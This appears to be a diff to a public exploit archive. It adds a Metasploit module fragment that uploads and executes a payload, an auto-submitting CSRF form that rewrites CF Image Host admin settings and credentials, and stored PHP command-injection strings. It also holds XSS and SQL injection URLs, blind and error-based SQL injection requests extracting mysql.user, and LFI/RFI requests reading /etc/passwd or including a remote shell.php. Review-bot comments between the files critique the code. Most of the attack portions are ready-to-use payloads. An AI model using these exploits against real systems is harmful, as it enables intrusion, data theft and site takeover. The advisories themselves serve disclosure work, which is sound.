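+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
+'vars_post' => {
+'file_name' => "#{phpfile_name}.txt",
+'script' => payload.encoded
+}
+)
+unless up_res
+fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
+end
+vprint_status('Checking Uploaded file...')
+res_up_check = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
+)
+if res_up_check && res_up_check.code == 200
+print_good("File found: #{phpfile_name}")
+else
+print_error('File not found')
+return
+end
+# Get Monitor ID
+vprint_status('Fetching Monitor ID...')
+res_mon_id = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
+'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+'vars_get' => {
+'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
+'iDisplayStart' => '0',
+'iDisplayLength' => '10',
+'sSearch' => 'Exploit'
+}
+)
+unless res_mon_id
+fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
+end
+matchdata = res_mon_id.body.match(/id=?[^>]*>/)
+unless matchdata
+fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
+end
+mon_get_id = matchdata[0].gsub(/[^\d]/, '')
+print_good("Monitor id aquired:#{mon_get_id}")
+# Executing monitor
+send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'main.php'),
+'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+'vars_post' => {
+'section' => 'RunERDCInstance',
+'subsection' => 'view',
+'id' => mon_get_id,
+'name' => 'Exploit'
+}
+)
+else
+print_error('Cookie not found')
+end
+end
+end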
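Review bot: `'newuser' => 'on'` and `'newuser' => '1'` on consecutive lines of the privilege-escalation `vars_post` hash are a duplicate key, so Ruby warns and only `'1'` is sent; one of the two should go. `cookie = Regexp.last_match(1)` after `=~ /login=true/` is always nil because the pattern has no capture group, and `cookie` is never read in either place, so both lines are dead code. `'Privileged' => 'true'` is a string where the framework expects a boolean, `create_exec_service` unpacks seven positional arguments of which only `cookie_split`, `cmd` and `cmdargs` are used, and `version >= '7.4.0' && version <= '7.5.0'` in `check` is a string comparison rather than a version comparison (`Gem::Version` is the usual form). The Description should also state what the module leaves behind on the target, since none of it is reverted: the USERNAME account is moved to `userroleid` 1, a monitor named `Exploit` is created, and `<phpfile_name>.txt` remains under `GUI/wizards`.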

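--- a/platforms/php/webapps/38698.html
+++ b/platforms/php/webapps/38698.html
@@ -0,0 +1,142 @@
+<!--
+[+] Credits: hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt
+Vendor:
+====================================
+codefuture.co.uk/projects/imagehost
+Product:
+===================================
+CF Image Host 1.65 - 1.6.6
+Archive download listed as: version 1.65
+unzips as imagehost 1.6.6
+Vulnerability Type:
+=================================
+Cross site request forgery - CSRF
+CVE Reference:
+==============
+N/A
+Vulnerability Details:
+=====================
+No CSRF protection exists allowing attackers to make requests to the server
+on behalf of the victim if they are logged in and visit a malicious site or
+click
+an infected linx. This will let attackers modify certain web application
+settings to
+whatever the attacker wishes.
+CSRF Exploit code(s):
+====================
+-->
+<form id='HELL' method="POST" action="
+http://localhost/imagehost1.6.6/admin.php?act=set">
+<input type="text" name="setScriptUrl" value="
+http://hyp3rlinx.altervista.org" />
+<input type="text" name="setTitle" value="ghostofsin" />
+<input type="text" name="setSlogan" value="666" />
+<input type="text" name="setCopyright" value="hyp3rlinx" />
+<input type="text" name="setTheme" value="day" />
+<input type="text" name="setModeRewrite" value="0" />
+<input type="text" name="setAddThis" value="0" />
+<input type="text" name="setLanguage" value="0" />
+<input type="text" name="changesettings" value="Save+Changes" />
+<input type="text" name="setModeRewrite" value="0" />
+<input type="text" name="setAllowReport" value="1" />
+<input type="text" name="setEmailReport" value="1" />
+<input type="text" name="setHideGallery" value="1" />
+<input type="text" name="setHideContact" value="1" />
+<input type="text" name="setHideTos" value="1" />
+<input type="text" name="setHideFaq" value="1" />
+<input type="text" name="setHideSearch" value="1" />
+<input type="text" name="setImageWidgit" value="1" />
+<input type="text" name="setHideFeed" value="1" />
+<input type="text" name="setHideSitemap" value="1" />
+<input type="text" name="setAutoDeleted" value="0" />
+<input type="text" name="setAutoDeletedTime" value="10" />
+<input type="text" name="setAutoDeletedJump" value="m" />
+<input type="text" name="setDisUpload" value="0" />
+<input type="text" name="setAutoDeleted" value="0" />
+<input type="text" name="setMaxSize" value="1048576" />
+<input type="text" name="setMaxBandwidth" value="1024" />
+<input type="text" name="setBandwidthReset" value="m" />
+<input type="text" name="setMaxUpload" value="5" />
+<input type="text" name="setNoDuplicate" value="0" />
+<input type="text" name="setResizeImg" value="1" />
+<input type="text" name="setPrivateImg" value="1" />
+<input type="text" name="setWaterMark" value="0" />
+<input type="text" name="setWatermarkText" value="0" />
+<input type="text" name="setWatermarkImage" value="1" />
+<input type="text" name="setWatermarkPlaced" value="1" />
+<input type="text" name="setSUrlApi" value="b54" />
+<input type="text" name="setSUrlApiUrl" value="" />
+<input type="text" name="setSUrlApiUesr" value="" />
+<input type="text" name="setSUrlApiPass" value="" />
+<input type="text" name="setAnalytics" value="" />
+<input type="text" name="setGoogleCha" value="" />
+<input type="text" name="setGoogleAds" value="" />
+<input type="text" name="oldPassword" value="" />
+<input type="text" name="newPassword" value="" />
+<input type="text" name="newConfirm" value="" />
+<input type="text" name="setUserName" value="admin" />
+<input type="text" name="setEmail" value="ghostofsin@abyss.com" />
+<script>document.getElementById('HELL').submit()</script>
+</form>
+<!--
+Disclosure Timeline:
+=====================
+Vendor Notification: NA
+November 14, 2015 : Public Disclosure
+Exploitation Technique:
+=======================
+Remote
+Severity Level:
+================
+High
+Description:
+============================================================
+Request Method(s): [+] POST
+Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+by hyp3rlinx
+-->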
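Review bot: `setModeRewrite` and `setAutoDeleted` are each posted twice in the form (value 0 both times), which looks like a copy-paste slip and should be deduplicated. The Vulnerability Details text says the flaw lets an attacker "modify certain web application settings", but the form also submits `oldPassword`, `newPassword`, `newConfirm`, `setUserName` and `setEmail`, i.e. the same unprotected `admin.php?act=set` handler covers the admin credentials; the advisory should state that explicitly, since that is the impact a site owner most needs to assess.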

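--- a/platforms/php/webapps/38699.txt
+++ b/platforms/php/webapps/38699.txt
@@ -0,0 +1,132 @@
+[+] Credits: hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt
+Vendor:
+====================================
+codefuture.co.uk/projects/imagehost
+Product:
+===================================
+CF Image Host 1.65 - 1.6.6
+Archive download listed as: version 1.65
+unzips as imagehost 1.6.6
+Vulnerability Type:
+=====================
+PHP Command Injection
+CVE Reference:
+==============
+N/A
+Vulnerability Details:
+=====================
+CF Imagehost allows users who have access to the management area the
+ability to write directly to the 'set.php' page under
+the /inc directory that stores setting values for the 'Site Title', 'Site
+Slogan' etc, this allows a local attacker ability to
+inject specially crafted PHP command payloads to execute arbitrary
+operating system commands on the victim host. Possibly leading
+to privilege escalation, RFI, backdoors etc.. and most likely full
+compromise of the affected system or shared environment
+if applicable.
+PHP Command Injection Exploit code(s):
+=====================================
+Under the setting tab we can inject following below PHP code and it will
+remain persistent as it is written disk in 'set.php',
+afterwards when the victim visits the application and click a tab the
+persistent OS command will be executed.
+1) navigate to CF image host settings tab
+http://localhost/imagehost1.6.6/admin.php?act=set
+2) click on admin menu on left and enter your passwords DO NOT click 'Save
+changes' yet! or you get error message to enter creds
+3) now go back to settings tab and click 'General' then inject below PHP
+code into the 'Site Title' input field
+4) now click 'Save Changes', this code will get stored under /inc
+directory within the 'set.php' PHP file.
+our PHP injection payload needs the single quotes, double back slashes,
+semicolons as described below to correctly escape the syntax
+so we do not break the PHP page and cause errors, our extra \\ quoutes and
+; gets removed after injection takes place.
+some examples...
+';echo exec("c:\\Windows\\system32\\calc.exe");'';';
+'set.php' on line 11 then becomes:
+$settings['SET_TITLE'] = '';echo
+exec("c:\Windows\system32\calc.exe");'';';';
+OR inject CMD to launch chrome.exe etc...
+';echo exec("c:\\Program Files
+(x86)\\Google\\Chrome\\Application\\chrome.exe");'';';
+After, click on some tabs above like 'Database' or 'Ban User' and Tada!
+this will execute our stored PHP command...
+either running calc.exe or launching Google Chrome.
+Disclosure Timeline:
+=====================
+Vendor Notification: NA
+November 13, 2015 : Public Disclosure
+Exploitation Technique:
+=======================
+Local / Remote
+Severity Level:
+================
+High
+Description:
+================================================================
+Request Method(s): [+] POST
+Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
+Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc..
+Affected Area(s): [+] OS
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+by hyp3rlinx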

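--- a/platforms/php/webapps/38709.txt
+++ b/platforms/php/webapps/38709.txt
@@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/61825/info
+MCImageManager is prone to multiple security vulnerabilities.
+An attacker may exploit these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, manipulate the page and spoof content to misguide users and to disclose or modify sensitive information. Other attacks may also be possible.
+MCImageManager 3.1.5 and prior versions are vulnerable.
+http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
+http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
+http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
+http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml
+File 1.xml:
+<?xml version="1.0" encoding="UTF-8"?>
+<playlist>
+<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
+<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
+</playlist>
+<html>
+<body>
+<script>
+function flvStart() {
+alert('XSS');
+}
+function flvEnd() {
+alert('XSS');
+}
+</script>
+<object width="50%" height="50%">
+<param name=movie value="flvPlayer.swf">
+<param name=quality value=high>
+<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.example1.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"; type="application/x-shockwave-flash"></embed>
+</object>
+</body>
+</html>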

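--- a/platforms/php/webapps/38712.txt
+++ b/platforms/php/webapps/38712.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/61880/info
+Bo-Blog is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
+Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
+Bo-Blog 2.1.1 is vulnerable; other versions may also be affected.
+http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi]
+http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS]
+http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS]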

218
platforms/php/webapps/38727.txt Executable file

@ -0,0 +1,218 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_17102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.
3. BLind SQL Injection (Admin)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.
Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.
Admin credentials are required to exploit this issue.
Proof of Concept
POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"
test
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg
img
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="mask"
11953405959037.jpg
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="remaining"
1
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"
f396df6c76265de943be163e9b65878a
-----------------------------16690383031191084421650661794--
Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.
Code
/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
$result = $this->database->getRow("select * from download where filename = '".$filename."'");
return $result;
}
function check_filename($filename){
$results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
return $results;
}
/upload/admin2/controller/download.php
function checkFiles() {
$files=glob(DIR_DOWNLOAD.'*.*');
if (!$files) { return; }
foreach ($files as $file) {
$pattern='/\.('.implode('|',$this->prohibited_types).')$/';
$filename=basename($file);
if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
$result = $this->modelDownload->check_download($filename);
if (!$result) { $this->init($filename); }
}
}
}
4. BLind SQL Injection (Customer)
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when using Paypal as a payment method during
checkout.
Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.
Proof of Concept
1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token.
The injection can be exploited blind:
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)
However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.
It is also possible with this injection to inject into an UPDATE statement in
update_order_status_paidunconfirmed. The problem here is that it is difficult
to create an injection that exploits the UPDATE statement, but also results in
an order_id being returned by the previous SELECT statement.
It may also be possible to use the order_id that can be controlled via the
SELECT statement to inject into the INSERT statement in update_order_history.
But again, it is difficult to craft a query that does this, but also returns a
valid result for the UPDATE query.
Code
/upload/catalog/extension/payment/paypal.php:
function orderUpdate($status = 'final_order_status', $override = 0) {
//Find the paid_unconfirmed status id
$results = $this->getOrderStatusId('order_status_paid_unconfirmed');
$paidUnconfirmedStatusId = $results?$results:0;
//Find the final order status id
$results = $this->getOrderStatusId($status);
$finalStatusId = $results?$results:0;
$reference = $this->request->get('ref');
//Get Order Id
$res = $this->modelPayment->get_order_id($reference);
$order_id = $res['order_id'];
//Update order only if state in paid unconfirmed OR override is set
if ($order_id) {
if ($override) {
// Update order status
$result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
}
} else {
// Update order status only if status is currently paid_unconfirmed
$result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');
}
}
}
}
/upload/catalog/model/payment/model_payment.php:
function get_order_id($reference){
$result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
return $result;
}
function update_order_history($order_id, $finalStatusId,$comment){
$this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");
}
function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
$result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
return $result;
}
5. Solution
To mitigate this issue please apply this patch:
http://forum.alegrocart.com/download/file.php?id=1040
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue
17/10/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-SQL-Injection-104.html
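Review bot: The report timeline entry `17/10/2015 Vendor releases fix` is day-first while every other date in the advisory is month-first (`09/29/2015`, `11/13/2015`); `10/17/2015` would be consistent with the other entries and with the patch name AC128_fix_17102015. The headings `3. BLind SQL Injection (Admin)` and `4. BLind SQL Injection (Customer)` carry a stray capital. The Solution section only links the patch; one sentence naming what the fix must do — bind or escape `$filename` in check_download/check_filename and `$reference` in get_order_id, whose string-built queries are quoted in the Code sections — would let readers verify the patch and protect forks of the code.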

129
platforms/php/webapps/38728.txt Executable file

@ -0,0 +1,129 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_22102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website: http://alegrocart.com/
Vulnerability Type: LFI/RFI
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When retrieving logs, there are no checks on the given file_path Parameter.
Because of this, local or remote files can be included, which are then executed
or printed.
Admin credentials are required to view logs.
3. Proof of Concept
Remote File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 441
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
http://localhost/shell.php
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-----------------------------16809437203643590021165278222--
Local File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 425
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
/etc/passwd
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-----------------------------16809437203643590021165278222--
For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack
strings were still working:
http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd
4. Code
/ upload/admin2/controller/report_logs.php
function get_file(){
$file = '';
if($this->request->gethtml('file_path', 'post')){
$file = file_get_contents($this->request->gethtml('file_path', 'post'));
}
if($this->request->gethtml('decrytion', 'post')){
$file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token'));
}
if($file){
$file = str_replace(array("\r\n", "\r", "\n"),'<br>', $file);
}
return $file;
}
5. Solution
To mitigate this issue please apply this patch:
TODO
Please note that a newer version might already be available.
6.. Report Timeline
09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html
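Review bot: The Solution section still reads `TODO` where the patch link belongs, although the Introduction already states `Fixed in: Patch AC128_fix_22102015` with its download link; the two should carry the same reference. The heading `6.. Report Timeline` has a doubled period. The timeline gives `11/03/2015 Vendor releases fix` while the patch name encodes 22102015, so one of the two dates looks wrong and is worth confirming. In the quoted get_file() the `file_path` value goes straight into file_get_contents with no path restriction, so a sentence stating that a correct fix must confine the path to the configured logs directory and reject URL wrappers would let readers check whether the linked patch is complete, given that the advisory notes two earlier patches were bypassed.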

133
platforms/php/webapps/38729.txt Executable file

@ -0,0 +1,133 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0.
An account with the role "Publisher" or "Administrator" is needed to exploit
each of these vulnerabilities.
3. SQL Injection 1 (Blind)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
The id parameter of the web user editor is vulnerable to blind SQL Injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> true
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> false
Code
/manager/actions/mutate_web_user.dynamic.php
$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id']."";
4. SQL Injection 2
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When updating a user, the newusername parameter is vulnerable to SQL injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
Code
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('manager_users') . "
SET username='$newusername'" . $updatepasswordsql . "
WHERE id=$id";
5. SQL Injection 3
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When updating a user, the country, role, blocked, blockeduntil, blockedafter,
failedlogincount, and gender parameter are vulnerable to SQL injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
The proof of concepts for the country, role, blocked, blockeduntil,
failedlogincount, and blockedafter parameter are analog to this POC for gender:
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
Visiting the overview page of that user will show the result of the injected
query.
Code
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . "
SET fullname='$fullname', role='$roleid', email='$email', phone='$phone',
mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state',
country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment',
failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil,
blockedafter=$blockedafter
WHERE internalKey=$id";
6. Solution
This issue has not been fixed by the vendor.
7. Report Timeline
10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-SQL-Injection-99.html
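Review bot: Because the Solution section states the vendor has not fixed the issue, the advisory leaves operators without a mitigation, although the quoted queries show where one applies. In mutate_web_user.dynamic.php the `id` value is concatenated into the query unquoted, so casting it to an integer before use closes Injection 1, and the two UPDATE statements in save_user_processor.php need parameterized statements or proper escaping of every interpolated field rather than the string interpolation shown. One sentence saying so, plus a recommendation to restrict the Publisher/Administrator roles the advisory names as prerequisites, would make the report actionable until a fix ships.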

51
platforms/windows/dos/38701.txt Executable file

@ -0,0 +1,51 @@
# TECO SG2 FBD Client 3.51 SEH Overwrite Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables to create and edit applications.
# The program is providing two edit modes, LADDER and FBD to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a Genie FBD, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .GFB file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (fb0.fd0): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# eax=4141413f ebx=00000004 ecx=41414141 edx=41414141 esi=0018f578 edi=00a642e8
# eip=00440b57 esp=0018ef9c ebp=0000003f iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# FBD+0x40b57:
# 00440b57 8995a0000000 mov dword ptr [ebp+0A0h],edx ss:002b:000000df=????????
# ---------------------------------------------------------------------------------
#
